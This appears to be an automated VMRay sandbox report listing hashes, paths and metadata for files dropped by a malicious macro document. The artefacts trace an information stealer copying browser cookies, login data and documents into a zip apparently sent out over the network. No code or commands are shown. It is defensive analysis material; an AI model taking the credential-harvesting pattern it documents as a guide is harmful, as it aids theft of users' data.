SHA1 bf8f14c3f6e8a6517dd5b067d5d5b9ff7778bcae Copy to Clipboard
SHA256 d14482419ded5ee9c10a1a06d3b8449efe2c1366d58ee0da6dcad5efad7e5195 Copy to Clipboard
SSDeep 192:jvKXzkVmvQhyn+ZoQfqlQbGhMHPaVAL23v8T7LJ:jozkVmvQhyn+ZooT7l Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_07.7774490+02_0011 Dropped File Sqlite
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\Cookies (Dropped File)
Mime Type application/x-sqlite3
File Size 28.00 KB
MD5 7639ae99cee86cb6edcbe024340b8a6b Copy to Clipboard
SHA1 d9943351c5f88cf54d236636a4e5526f54e35c7d Copy to Clipboard
SHA256 0d2adcc49a91cfd67a4920bcafeef618cb59daa249979fd49bc7c0cfe168c055 Copy to Clipboard
SSDeep 48:T24/ecVTgPOpEveoJZFrU1cQB+hC8T05kXGRjmWXHmSfIwNs:i4HSNDJA+kgXuF3mS1 Copy to Clipboard
ImpHash -
Browsers\Default_Google_Chrome_Cookies.txt Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type text/plain
File Size 354 Bytes
MD5 1d6704d41536bbc29cb121cb6d4259a9 Copy to Clipboard
SHA1 21070911e0e83bbf5b8f4712f23cef102b474ac8 Copy to Clipboard
SHA256 8ec976b33b19d48d4a3a1dc2d88d7f72a85baadc3fb3b24e0b1092b9ee72d8ea Copy to Clipboard
SSDeep 6:PkIAGScJjP9F0cIpWS7OftPhEkfsxQ3niATiKOJPMiQvIAEmAQpNIIAwJQx5IVc:cIATQJOr015DfQQXiwej0IAjLIIAwk5n Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\bd33D770D006BC47C58714222CDAC43A71.tmp Dropped File Sqlite
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\Login Data (Dropped File)
Mime Type application/x-sqlite3
File Size 18.00 KB
MD5 c1cb90b7e585751478403b2c743a3a90 Copy to Clipboard
SHA1 022c52217e8b67d7d481b0785b36bd5726ed4db5 Copy to Clipboard
SHA256 3be39bbaa1d6dd9da16beb406b1a90e4291882eb7995fd11d4d6d186afe70512 Copy to Clipboard
SSDeep 24:LLkH0KL7G0TMJHUyyJtmCm0XKY6lOKQAE9V8MffD4fOzeCmly6UwcagEW:Ez+JH3yJUheCVE9V8MX0PFlNU12W Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\ls33D770D006BC47C58714222CDAC43A71.tmp Dropped File Text
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Local State (Dropped File)
Mime Type text/plain
File Size 125.06 KB
MD5 ebe6a0ec6d15f8b882b47c67803e6bd9 Copy to Clipboard
SHA1 64771cdf41c950e41011b8860cb9a95b06028559 Copy to Clipboard
SHA256 a76aeaf732cad3e5408901dd459f1820f6f4636ba9234666b3607491f9940c84 Copy to Clipboard
SSDeep 3072:TkJGdiEorh+2dYQCgtE0pEuR//5SrdqOJF/B2mQdNEj:gvDrc2+0Ee1hodvJ1jQPe Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_12.8873495+02_0011 Dropped File Sqlite
Unknown
»
Also Known As C:\Users\FD1HVy\AppData\Local\Temp\tempDataBase2020-10-04T23_56_12.8092175+02_0011 (Dropped File)
C:\Users\FD1HVy\AppData\Local\Google\Chrome\User Data\Default\Web Data (Dropped File)
Mime Type application/x-sqlite3
File Size 68.00 KB
MD5 61f06ad52096786392c9cf040fe47608 Copy to Clipboard
SHA1 62fda5b9fd8c7fe273152d19140dc45bdbca1c52 Copy to Clipboard
SHA256 d4fc81ae1cf95df6efb4b5ecf6f65932ee8bb43ce5ab3061de289bba67eb02f9 Copy to Clipboard
SSDeep 96:Ri3Zht6YnMvqI738Hsa/NTIdEFaEdUDSuKn8Y/qBOnxjyWTJereWb3Ds4BlrGb4q:RgZLHMEhTJMb3Dabetl0j Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\R725K54.tmp Dropped File Text
Unknown
»
Mime Type text/plain
File Size 158 Bytes
MD5 0595a77bb6a372c681b1c11f248c6d5e Copy to Clipboard
SHA1 0ccd7e8e7c3ff8253a6a8810f5882c1534a3e824 Copy to Clipboard
SHA256 96c6920b4245137742d5781d737304f2e07b77aeff28057dbc0de05d0112969b Copy to Clipboard
SSDeep 3:Bz/bELeWyvIY0zRVWJrCImX2gCO/yvPLMugtnRWvpGAXR0iugpvctNtWd:BLbE38IYIRsLmX266PLMjBR2pX+Bgq5K Copy to Clipboard
ImpHash -
information.log Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type text/plain
File Size 707 Bytes
MD5 9476149d85cfbda3d13f5f23884ee503 Copy to Clipboard
SHA1 141abe6c90c500903535daae210d4b174c70355b Copy to Clipboard
SHA256 35dddf863da7de61cfd6e940f9f8148a8c7ba2491e53a97f2e6226ec905e7119 Copy to Clipboard
SSDeep 12:iNFLJYu22y1PfABZKTt5vuwawRhtHKRiY/ViFK75phYlBdfqOJBIcfs6b6tJYBo:udYuMnW0tnrtxYti25phyDfqOscfBboR Copy to Clipboard
ImpHash -
cookieDomains.log Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type text/plain
File Size 1.67 KB
MD5 aa16e2fbbb0565f269886ef12d09a2b5 Copy to Clipboard
SHA1 c568f646ef465d9ee37fddb40be69b4b7f976db3 Copy to Clipboard
SHA256 5f9a7aecb178fbd00cd02d1b272b4369e5a984ffab94d22ad83c1697ecc03cb1 Copy to Clipboard
SSDeep 48:c/uuuuxuuuuuoum5pA9H9Xleuttr2/uuuuxuuuuuoum5pA9H9XleuttrC:FpE Copy to Clipboard
ImpHash -
Browsers\w7cr0hor.default_Firefox_Cookies.txt Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type text/plain
File Size 13.81 KB
MD5 a12d16bc9b53254d4b63f3fcb33c8ab5 Copy to Clipboard
SHA1 b79350e300063c5b6370801ac0c2a934ab6d5a94 Copy to Clipboard
SHA256 dd60108735da743cbac174eab1ab852dd045c7f1bff71dec58fd4b9bac35a4ef Copy to Clipboard
SSDeep 384:76Ozip9fx0B97S/1YO6Ozip9fx0B97S/1Yg:bzS9fx0Bc/1FzS9fx0Bc/1p Copy to Clipboard
ImpHash -
C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip Dropped File ZIP
Unknown
»
Mime Type application/zip
File Size 505.43 KB
MD5 2a1968b07eac816234c5baee6407539e Copy to Clipboard
SHA1 12ed896cd7991d62185d28f4ddced0bfbfc067a5 Copy to Clipboard
SHA256 d79f621d8a8b6a2e541b8d8a0c707bfbdb49e43edc2b957b91dc74b990c68532 Copy to Clipboard
SSDeep 12288:Wf8299ueIcQFSCFeqjkSi05gxdfN3YP30yeLTRJVjmVZ6:+v9ZIcASCFzkSNsNIP30yeLTRfjm2 Copy to Clipboard
ImpHash -
Archive Information
»
Number of Files 15
Number of Folders 0
Size of Packed Archive Contents 503.45 KB
Size of Unpacked Archive Contents 558.56 KB
File Format zip
Contents (15)
»
Filename Packed Size Unpacked Size Compression Is Encrypted Modify Time Actions
Files\Gwq5EHvw1.docx 86.02 KB 86.00 KB Deflate False 2020-02-15 16:17 (UTC+1)
Files\YsuINtJM29u.docx 59.45 KB 59.43 KB Deflate False 2019-10-09 05:19 (UTC+2)
Files\CQmwTaiySiiMfKSxL.docx 61.59 KB 61.57 KB Deflate False 2019-11-24 18:08 (UTC+1)
Files\7d4Q8tI0a.docx 94.19 KB 94.16 KB Deflate False 2019-11-01 01:54 (UTC+1)
information.log 506 Bytes 707 Bytes Deflate False 2020-10-04 23:56 (UTC+2)
Files\4uV4065ClZioLoOxUX7f.docx 85.64 KB 85.61 KB Deflate False 2019-12-19 07:37 (UTC+1)
UserAgents.txt 146 Bytes 196 Bytes Deflate False 2020-10-04 23:56 (UTC+2)
cookieDomains.log 228 Bytes 1.67 KB Deflate False 2020-10-04 23:56 (UTC+2)
Browsers\Default_Google_Chrome_Cookies.txt 265 Bytes 354 Bytes Deflate False 2020-10-04 23:56 (UTC+2)
Browsers\w7cr0hor.default_Firefox_Cookies.txt 2.98 KB 13.81 KB Deflate False 2020-10-04 23:56 (UTC+2)
passwords.log 0 Bytes 0 Bytes Store False 2020-10-04 23:56 (UTC+2)
passwords.log 0 Bytes 0 Bytes Store False 2020-10-04 23:55 (UTC+2)
passwords.log 0 Bytes 0 Bytes Store False 2020-10-04 23:56 (UTC+2)
passwords.log 0 Bytes 0 Bytes Store False 2020-10-04 23:56 (UTC+2)
screen.jpeg 112.47 KB 155.09 KB Deflate False 2020-10-04 23:55 (UTC+2)
d7942a7a0c710b1efae85f2eac9483c86ac0c85a36ef207d36614a7d38c977f2 Downloaded File Text
Unknown
»
Parent File analysis.pcap
Mime Type text/plain
File Size 156 Bytes
MD5 8adeca342e7fceebd05b654771a56711 Copy to Clipboard
SHA1 b33138d383238baf718aff97de0c632a15087a7e Copy to Clipboard
SHA256 d7942a7a0c710b1efae85f2eac9483c86ac0c85a36ef207d36614a7d38c977f2 Copy to Clipboard
SSDeep 3:Bz/bELeWyvIY0zRVWJrCImX2gCO/yvPLMugtnRWvpGAXR0iugpvctNtWg:BLbE38IYIRsLmX266PLMjBR2pX+Bgq5f Copy to Clipboard
ImpHash -
Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip Embedded File ZIP
Unknown
»
Parent File analysis.pcap
Mime Type application/zip
File Size 233.43 KB
MD5 a48ff54aeb9cfa7209683123f7690a52 Copy to Clipboard
SHA1 9c8fefa1bb035d51ff1a4c45f710bd1bb4e76bc3 Copy to Clipboard
SHA256 e17573e5893d0547c430967a2b15f871398e09f26534d65cabd0266cc2703c02 Copy to Clipboard
SSDeep 6144:WK68S6ubcOpiiQuju4rM2IRP0TkVCKs/TCx:Wf8299ueIcQFSCx Copy to Clipboard
ImpHash -
footer1.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 2.04 KB
MD5 fd02939c2a8a8f8e8c071b448d4a9b37 Copy to Clipboard
SHA1 c2466af40282612ef629d0a521924a0a1a0d11bd Copy to Clipboard
SHA256 0329d7c3e1bca4854940960509fcfca6fce179c295ef896c2c4c590d37036566 Copy to Clipboard
SSDeep 48:cfv+flWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pgTGAd+7cyLg8TGf:AmlWc6mmY+bzZliSwT/iZo3r6LJ4 Copy to Clipboard
ImpHash -
settings.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 7.96 KB
MD5 0fef1ed8dc19c7f56d9cb41c3d60e72e Copy to Clipboard
SHA1 59424752324c87e93a01767a61cada27afc5e73c Copy to Clipboard
SHA256 6025ddfa5e71ef3e8e7d62c505510ef057b5047f27714440ab81c7bb10a1a75d Copy to Clipboard
SSDeep 96:+c6mmY+bliSwTN1EkQxNExbuES73Ur8oqvUwpg4d8/VRmrYpKr6kGT4vjW51foQh:+xmmY+gZ1EY2Ld8/nfA6lT4vjAfoQgaH Copy to Clipboard
ImpHash -
footer2.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 2.23 KB
MD5 71514275c1ac9b5158a85fd6252d997a Copy to Clipboard
SHA1 c3e799eddc2825f31062462fe09e10c7b1ee4562 Copy to Clipboard
SHA256 7bd0a7b5ce5b54522d6172a092028c91ea215ce441be2bfe02f02f7c12fd0aee Copy to Clipboard
SSDeep 48:cfv+flWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pgTGAd+7cyLgjCg8TGf:AmlWc6mmY+bzZliSwT/iZo3r6L1J4 Copy to Clipboard
ImpHash -
footnotes.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 1.72 KB
MD5 09241a693b7d6019996f4e8dd990c9c1 Copy to Clipboard
SHA1 d0e03af5c6ce776e3bd84ca9426c321f9851d521 Copy to Clipboard
SHA256 8fed7471df3205ba505b8023e5b88c4d1bb9799680e218928dc8438fa8960a42 Copy to Clipboard
SSDeep 48:c4v+flWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pPA6IgM:9mlWc6mmY+bzZliSwT/iZoO1k Copy to Clipboard
ImpHash -
vbaProject.bin Embedded File OLE Compound
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type application/CDFV2
File Size 29.00 KB
MD5 e0bd0b839c0f9b5ea9484059d47da960 Copy to Clipboard
SHA1 e19a26273d8df60f25e6dd5f6535a13dfc666b89 Copy to Clipboard
SHA256 944e0eab8cb086d61940c1b89bca9aaead96f296d9e21bced631e3515477dbf4 Copy to Clipboard
SSDeep 768:H6ycST9q8vinw9HY1SAgCYHJnzhDog16B:HNinw96/aVzZog16B Copy to Clipboard
ImpHash -
document.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 183.45 KB
MD5 f20ad12abd81b54f5c9a0b87bb1d3525 Copy to Clipboard
SHA1 ce26ae83e8ddd7a5790b60a4aaeef4cb85322a47 Copy to Clipboard
SHA256 aca7eaa7868046c6adbf8282ad97315060431212fe04a93b0686c65c22f6e13d Copy to Clipboard
SSDeep 3072:4kR9iINT2ZKIw/t5bDvVoGThCRfXDx6BYTJxX2KN/yi+jDHZz3gGEIE+Mr/izVRX:h Copy to Clipboard
ImpHash -
c4a1266cae25fe4664c4511511890ff2d8b53a8a08f5c90cf41f49079910d212 Embedded File Binary
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type application/x-dosexec
File Size 26 Bytes
MD5 d9fafb5ef04e000f0531b615ab8e2836 Copy to Clipboard
SHA1 49f90541a14b2e53997550d6108014d2aa2748bb Copy to Clipboard
SHA256 c4a1266cae25fe4664c4511511890ff2d8b53a8a08f5c90cf41f49079910d212 Copy to Clipboard
SSDeep 3:7Hvnf:L Copy to Clipboard
ImpHash -
endnotes.xml Embedded File Text
Unknown
»
Parent File C:\Users\FD1HVy\Desktop\CUsersUserDesktopfasfas.docm
Mime Type text/xml
File Size 1.71 KB
MD5 d064bf01f347d2e2cead1d4e0cc8d99c Copy to Clipboard
SHA1 59da86f596924052b67a8e7fff47153a1994a03a Copy to Clipboard
SHA256 dd831a110ec371bd51ed09c6cb34eda990996f33d85a602ede402399ad1e0bbe Copy to Clipboard
SSDeep 48:cpv+flWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+p/7g0:UmlWc6mmY+bzZliSwT/iZoO Copy to Clipboard
ImpHash -
passwords.log Embedded File Empty File
Not Queried
»
Parent File C:\Users\FD1HVy\AppData\Local\Temp\Germany_94.114.3.195_33D770D006BC47C58714222CDAC43A71.zip
Mime Type inode/x-empty
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image